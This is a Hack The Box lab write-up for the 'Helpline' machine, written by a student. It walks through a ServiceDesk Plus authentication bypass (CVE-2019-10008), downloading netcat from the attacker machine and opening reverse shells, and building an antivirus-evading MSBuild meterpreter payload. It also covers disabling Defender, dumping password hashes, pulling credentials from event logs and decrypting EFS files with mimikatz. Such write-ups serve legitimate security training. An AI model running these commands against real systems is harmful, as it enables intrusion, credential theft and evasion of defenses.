Summary:
Helpline is one of the more advanced and difficult machines on Hack The Box. There is more than one solution to many of the parts of this machine; however, it ultimately leads to some necessary cryptography at the end. What's more interesting is that this box highlights the limitations of the NT AUTHORITY\SYSTEM user. The box was created by egre55, a security researcher, sysadmin, and penetration tester.
Initial Foothold
Scanning the host:
nmap -sV -sC -oA nmap/Helpline 10.10.10.132
Results:
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 8080/tcp open http-proxy - ... | HTTP/1.1 200 OK ... |_http-title: ManageEngine ServiceDesk Plus 49667/tcp open msrpc Microsoft Windows RPC
Visiting the http server on port 8080, we find a web service running on ManageEngine ServiceDesk Plus running version 9.3
Researching the application yields a privilege escalation vulnerability (CVE-2019-10008) and a proof of concept written in python on exploitdb.
The default credentials for the guest user appear to be valid by the script:
root@kali:~/htb/Helpline# python exploit.py Url: http://10.10.10.132:8080 User with low priv: guest:guest User to bypass authentication to: administrator Getting a session id Sessid: 253F63CAA88CB4B038ABA7F875E58F00 Logging in with low privilege user Captured authenticated cookies. C61BEE8F56F3BF1D596310679422DC08 B033BABB25C780CC019846A68E9F4A03 Captured secondary sessid. 23C137AAF76F84540E20B35DC9223AA3 Doing the magic step 1. Doing the magic step 2. Captured target session.Set following cookies on your browser. JSESSIONID=BBA53F1EB6E71B990A4606BE77C27F8C JSESSIONIDSSO=2974B614693EECE03EC59BD8F0EB64F0 febbc30d=da76fd72fc7d4cf988e2a4353b005060 mesdp1b50439e2e=5683542a6b38590ee79e0de77aede40061b36db8 _rem=true
Logging in as guest with the default guest credentials, we can adjust our stored cookies in the developer console so we can impersonate the administrator user.
Acquiring a Shell
Command Scheduler
By visiting the Admin tab there is a section called Custom Schedules that allows the help-desk application to locally schedule and execute commands:
Scheduling the command below, we can download a portable netcat windows binary from our machine.
powershell.exe "IWR -Uri http://10.10.14.98/nc.exe -OutFile nc.exe"
If we schedule a second command using the netcat binary, we can create a reverse shell back to us from the web server:
powershell.exe -exec bypass -c ".\nc.exe 10.10.14.98 1337 -e powershell.exe"
Both commands are successful, and we are running as the system user on the E drive.
We can search and enumerate user directories with the Get-ChildItem cmdlet:
gci -recurse C:\Users\ | where { ! $_.PSIsContainer } | select fullname | findstr /i /v "url lnk"
FullName -------- C:\Users\Administrator\Desktop\root.txt C:\Users\leo\Desktop\admin-pass.xml C:\Users\leo\Documents\run.ps1 C:\Users\tolu\Desktop\user.txt
Oddly, as the system user and after running both takeown and icacls on user.txt, we still do not have privileges to read any of the files. Let's find out if our file system is encrypted in anyway.
C:\Users\Leo\Documents>Cipher /U /N
Encrypted File(s) on your system:
C:\Users\Administrator\Desktop\root.txt
C:\Users\leo\Desktop\admin-pass.xml
C:\Users\leo\Documents\run.ps1
C:\Users\tolu\Desktop\user.txt
To access these files, we can try signing in as the users who own them. If we enumerate further, there exists a "C:\Temp\Password Audit\it_logins.txt" file with clear-text creds (this actually isn't very useful for us):
PS C:\Temp\Password Audit> cat 'C:\Temp\Password Audit\it_logins.txt'
local Windows account created
username: alice
password: $sys4ops@megabank!
admin required: no
shadow admin accounts:
mike_adm:Password1
dr_acc:dr_acc
User Shell(s)
Creating a Meterpreter Session
Using GreatSCT, we can bypass Windows Defender and create a reverse shell for meterpreter using MSBuild
root@kali:/opt/GreatSCT# ./GreatSCT.py =============================================================================== GreatSCT | [Version]: 1.0 =============================================================================== [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker =============================================================================== Main Menu 1 tools loaded Available Commands: exit Exit GreatSCT info Information on a specific tool list List available tools update Update GreatSCT use Use a specific tool Main menu choice: use 1 ----------------------------------------------------------------------------- GreatSCT-Bypass Menu 26 payloads loaded Available Commands: back Go to main GreatSCT menu checkvt Check virustotal against generated hashes clean Remove generated artifacts exit Exit GreatSCT info Information on a specific payload list List available payloads use Use a specific payload GreatSCT-Bypass command: use 9 ----------------------------------------------------------------------------- Payload: msbuild/meterpreter/rev_tcp selected Required Options: Name Value Description ---- ----- ----------- DOMAIN X Optional: Required internal domain EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days HOSTNAME X Optional: Required system hostname INJECT_METHOD Virtual Virtual or Heap LHOST IP of the Metasploit handler LPORT 4444 Port of the Metasploit handler PROCESSORS X Optional: Minimum number of processors SLEEP X Optional: Sleep "Y" seconds, check if accelerated TIMEZONE X Optional: Check to validate not in UTC USERNAME X Optional: The required user account Available Commands: back Go back exit Completely exit GreatSCT generate Generate the payload options Show the shellcode's options set Set shellcode option [msbuild/meterpreter/rev_tcp>>] set lhost 10.10.14.98 [msbuild/meterpreter/rev_tcp>>] generate Please enter the base name for output files (default is payload): payload [*] Language: msbuild [*] Payload Module: msbuild/meterpreter/rev_tcp [*] MSBuild compiles for us, so you just get xml :) [*] Source code written to: /usr/share/greatsct-output/source/payload.xml [*] Metasploit RC file written to: /usr/share/greatsct-output/handlers/payload.rc Please press enter to continue >: exit
Have the remote host download payload.xml from your Kali instance and run the Metasploit rc file to setup the handler. Kali:
msfconsole -r payload.rc
Windows Remote Host
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\payload.xml
From your meterpreter session, dump hashes:
meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY f684313986dcdab719c2950661809893... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:d5312b245d641b3fae0d07493a022622::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:52a344a6229f7bfa074d3052023f0b41::: alice:1000:aad3b435b51404eeaad3b435b51404ee:998a9de69e883618e987080249d20253::: zachary:1007:aad3b435b51404eeaad3b435b51404ee:eef285f4c800bcd1ae1e84c371eeb282::: leo:1009:aad3b435b51404eeaad3b435b51404ee:60b05a66232e2eb067b973c889b615dd::: niels:1010:aad3b435b51404eeaad3b435b51404ee:35a9de42e66dcdd5d512a796d03aef50::: tolu:1011:aad3b435b51404eeaad3b435b51404ee:03e2ec7aa7e82e479be07ecd34f1603b:::
With a user's hash, we can attempt to crack or reverse-lookup the respective hashes in public repositories.
d5312b245d641b3fae0d07493a022622 Unknown Not found. 31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 31d6cfe0d16ae931b73c59d7e0c089c0 NTLM 52a344a6229f7bfa074d3052023f0b41 Unknown Not found. 998a9de69e883618e987080249d20253 Unknown Not found. eef285f4c800bcd1ae1e84c371eeb282 NTLM 0987654321 60b05a66232e2eb067b973c889b615dd Unknown Not found. 35a9de42e66dcdd5d512a796d03aef50 Unknown Not found. 03e2ec7aa7e82e479be07ecd34f1603b Unknown
Zachary's password is "0987654321" and he is in the Event Log Readers group.
With the administrator hash, we can do a Pass-the-hash attack over psexec, but only if we disable Real-Time Monitoring in Windows defender as NT AUTHORITY\SYSTEM (we no longer need MSBuild to create meterpreter sessions).
Set-MpPreference -DisableRealtimeMonitoring $true
To read the contents of Leo's user directory, we can either migrate our current SYSTEM user process to a process being ran by Leo or impersonate Leo's tokens using incognito.
meterpreter > ps ... 4724 5036 ctfmon.exe x64 1 HELPLINE\leo C:\Windows\System32\ctfmon.exe 4804 3736 postgres.exe x86 0 NT AUTHORITY\SYSTEM E:\ManageEngine\ServiceDesk\pgsql\bin\postgres.exe 4852 596 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 4908 904 MSBuild.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 5036 596 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 5180 620 vmtoolsd.exe x64 1 HELPLINE\leo C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ... meterpreter > migrate 5180 [*] Migrating from 5320 to 5180... [*] Migration completed successfully. meterpreter > shell Process 3280 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.253] (c) 2018 Microsoft Corporation. All rights reserved C:\Windows\system32>type %userprofile%\Desktop\* C:\Users\leo\Desktop\admin-pass.xml 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f2fefa98a0d84f4b917dd8a1f5889c8100000000020000000000106600000001000020000000c2d2dd6646fb78feb6f7920ed36b0ade40efeaec6b090556fe6efb52a7e847cc000000000e8000000002000020000000c41d656142bd869ea7eeae22fc00f0f707ebd676a7f5fe04a0d0932dffac3f48300000006cbf505e52b6e132a07de261042bcdca80d0d12ce7e8e60022ff8d9bc042a437a1c49aa0c7943c58e802d1c758fc5dd340000000c4a81c4415883f937970216c5d91acbf80def08ad70a02b061ec88c9bb4ecd14301828044fefc3415f5e128cfb389cbe8968feb8785914070e8aebd6504afcaa
This is the administrator's password in a PSCredential format. We will decrypt it later and focus on getting the contents of user.txt. We can dump and search the logs for tolu's password using zachary's credentials in powershelll.
PS C:\Windows\system32>evtutil el > C:\EventLogs.txt PS C:\Windows\system32>foreach($line in Get-Content C:\Eventlogs.txt) {wevtutil qe /r:10.10.10.132 /u:HELPLINE\zachary /p:0987654321 $line >> C:\ReadableLogs.txt}
Download ReadableLogs.txt to your Kali instance from meterpreter and convert it to a parse-friendly file.
meterpreter > cd C:/ meterpreter > download ReadableLogs.txt [*] Downloading: ReadableLogs.txt -> ReadableLogs.txt [*] Downloaded 1.00 MiB of 75.37 MiB (1.33%): ReadableLogs.txt -> ReadableLogs.txt ... [*] download : ReadableLogs.txt -> ReadableLogs.txt ... root@kali:/htb/Helpline# dos2unix ReadableLogs.txt dos2unix: converting file ReadableLogs.txt to Unix format... root@kali:~/htb/Helpline# grep tolu ReadableLogs.txt | grep "4688 " | grep -o "Command.*" | nl 1 CommandLine'>"C:\Windows\system32\net.exe" use T: \\helpline\helpdesk_stats /USER:tolu !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event> 2 CommandLine'>"C:\Windows\system32\systeminfo.exe" /S \\helpline /U /USER:tolu /P !zaq1234567890pl!99</Data><Data Name='TargetUserSid'>S-1-0-0</Data><Data Name='TargetUserName'>-</Data><Data Name='TargetDomainName'>-</Data><Data Name='TargetLogonId'>0x0</Data><Data Name='ParentProcessName'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe<</Data><Data Name='MandatoryLabel'>S-1-16-12288</Data></EventData></Event>
User tolu has the password "!zaq1234567890pl!99".
With Powershell Remoting, we can locally authenticate as tolu and read user.txt:
PS C:\Windows\system32>$user = 'HELPLINE\tolu' PS C:\Windows\system32>$pass= ConvertTo-SecureString '!zaq1234567890pl!99' -AsPlainText -Force PS C:\Windows\system32>$cred = New-Object System.Management.Automation.PSCredential($user, $pass) PS C:\Windows\system32>Invoke-Command -ComputerName HELPLINE -Credential $cred -Authentication credssp -ScriptBlock {type c:\Users\tolu\Desktop\user.txt} 0d522**************************d3
Privilege Escalation to Administrator
Reading root.txt
Using the encrypted PSCredentials from earlier, we can determine the plaintext credentials with powershell, sign in as administrator, and create a stable reverse shell from earlier's netcat binary
PS C:\Users\leo\Desktop\>$user = 'HELPLINE\Administrator' PS C:\Users\leo\Desktop\>$file = '.\admin-pass.xml' PS C:\Users\leo\Desktop\>$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,(Get-Content $file | ConvertTo-SecureString) PS C:\Users\leo\Desktop\>$cred.GetNetworkCredential().password mb@letmein@SERVER#acc PS C:\Users\leo\Desktop\>$securePassword = ConvertTo-SecureString -AsPlainText -Force 'mb@letmein@SERVER#acc' PS C:\Users\leo\Desktop\>$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword PS C:\Users\leo\Desktop\>Enter-PSSession -ComputerName localhost -Credential $credential [localhost]: PS C:\Users\Administrator\Documents> C:\Temp\nc.exe -e powershell.exe 10.10.14.98 1337 ... PS C:\Users\Administrator\Documents> cat ~\Desktop\root.txt cat : Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
The file is still encrypted. Return to the user who encrypted the file with the administrator's credentials (NT Authority\SYSTEM) and decrypt the EFS with mimikatz (mimikatz should be written to a writable path).
PS C:\Users\Administrator\Desktop>Cipher /C C:\Users\Administrator\Desktop\root.txt Listing C:\Users\Administrator\Desktop\ New files added to this directory will not be encrypted. E root.txt Compatibility Level: Windows XP/Server 2003 Users who can decrypt: HELPLINE\Administrator [Administrator(Administrator@HELPLINE)] Certificate thumbprint: FB15 4575 993A 250F E826 DBAC 79EF 26C2 11CB 77B3 No recovery certificate found. Key information cannot be retrieved. The specified file could not be decrypted. ... ... ... C:\Temp\mimikatz\Win32>mimikatz.exe .#####. mimikatz 2.2.0 (x86) #18362 Aug 14 2019 01:31:19 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # crypto::system /file:C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3 /export * File: 'C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\FB154575993A250FE826DBAC79EF26C211CB77B3' [0019/1] SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID 6717f9a477e4b552766871d193244f25 [0045/1] BACKED_UP_PROP_ID 00 [0002/1] KEY_PROV_INFO_PROP_ID Provider info: Key Container : 3dd3e213-bce6-4acb-808c-a1b3227ecbde Provider : Microsoft Enhanced Cryptographic Provider v1.0 Provider type : RSA_FULL (1) Type : AT_KEYEXCHANGE (0x00000001) Flags : 00000000 Param (todo) : 00000000 / 00000000 [0003/1] SHA1_HASH_PROP_ID fb154575993a250fe826dbac79ef26c211cb77b3 [0014/1] KEY_IDENTIFIER_PROP_ID b2cf7205f001b70c66aab61c241e46f1b4821eb8 [0020/1] cert_file_element Data: 30820314308201fca0030201020210194a705262024cab4094533eed3561f8300d06092a864886f70d01010505003018311630140603550403130d41646d696e6973747261746f723020170d3138313232333139353533345a180f32313138313132393139353533345a3018311630140603550403130d41646d696e6973747261746f7230820122300d06092a864886f70d01010105000382010f003082010a0282010100c33c505d59ea1dd47306b84f92833d5b33f9c6422a546368176de4b3dbbd29730192b43273ad98f3719d657176d7586e841bcb177d5e3275f092155c7c422180964a024d5d982982610860aec5525e58523d7633512b264de41a46ee7cd89c26a5a013f5a9fb1eed992f98c0ab5be241b1c796e74ba5924b7d074f15ee67534e089b86bc43d670832404fe63a9cdf5ccf84532ef8bf800597de0f4553785e516f91255be7cae47ba99cce2c1d2bda076074da0e66de4ec9e7bd4f67b49bcf896ba8f20554eeac4f28b0588378fd435dba1d4d5bd2667fa79a47835b9c834dbc0d65b067dd09ac49f31c5737665af8e3a66514135b3e5d482a7e66e7111b689390203010001a358305630150603551d25040e300c060a2b0601040182370a030430320603551d11042b3029a027060a2b060104018237140203a0190c1741646d696e6973747261746f724048454c504c494e450030090603551d1304023000300d06092a864886f70d01010505000382010100967ac2ac65fe0cb96583240be69e81173546a6d817951e338aa58d7c5e8f2b96c2af6c2a758800c086eb8cb55a525c4f85af2311ac6e655a7a071f719b5a776de45edc699bbd47bcb9b235595990bcf518d20635d297aa576b97932248414d2f1ac849d525379065f5f4c640cc9ebac0a2c240263c08ef4c54e9c9a6b08dd0cf4eb78e1d5e7341b1a950045c2d3233554aeff1294d300e0a5cf75eaf832b76c0fa96e7e3a4c28ddb639d366da1e0f3af91d678c22acd980890af1372f37954d503e133261a078a161d9cba85dd28b2ef0eebffb1b8ae0980c7978021b01fcf0dc5f282ab67be4540418b05a627b6b34b06bf5283b00efb3a32ae651e132eb3d3 Saved to file: FB154575993A250FE826DBAC79EF26C211CB77B3.der ... ... //Follow the path to the private key location (directory is hidden) C:\Temp\mimikatz\Win32>dir /a C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85 ... ... //Command to get Private key's masterkey mimkatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85 ... //Command to decrypt Master Key mimikatz # dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:mb@letmein@SERVER#acc ... Auto SID from path seems to be: S-1-5-21-3107372852-1132949149-763516304-500 [masterkey] with password: mb@letmein@SERVER#acc (normal user) key : 8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8 sha1: b18974052cb509a86a008869fd95388550678184 ... ... //Command to decrypt private key mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85" ... //Private key is decrypted -> raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk ... //Must download private keys locally to forge a certificate that will let us read root.txt ... root@kali:~/htb/Helpline# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem root@kali:~/htb/Helpline# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem writing RSA key root@kali:~/htb/Helpline# openssl pkcs12 -in public.pem -inkey private.pem -password pass:mimikatz -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ... //Upload and import cert C:\Users\Administrator\Desktop>certutil -user -p mimikatz -importpfx cert.pfx NoChain,NoRoot Certificate "Administrator" added to store. CertUtil: -importPFX command completed successfully. C:\Users\Administrator\Desktop>type root.txt type root.txt d8142**************************2c
Congratulations, you pwned a not-so easy machine!
It personally took me a week to finish a box of this magnitude and difficulty. There were a few misleading plain-text credentials in the Web API and a few other places stored locally on the box, so it was very easy to fall into a rabbit hole for a few hours or longer.
— Rayce Toms
Student Researcher
Comments
Post a Comment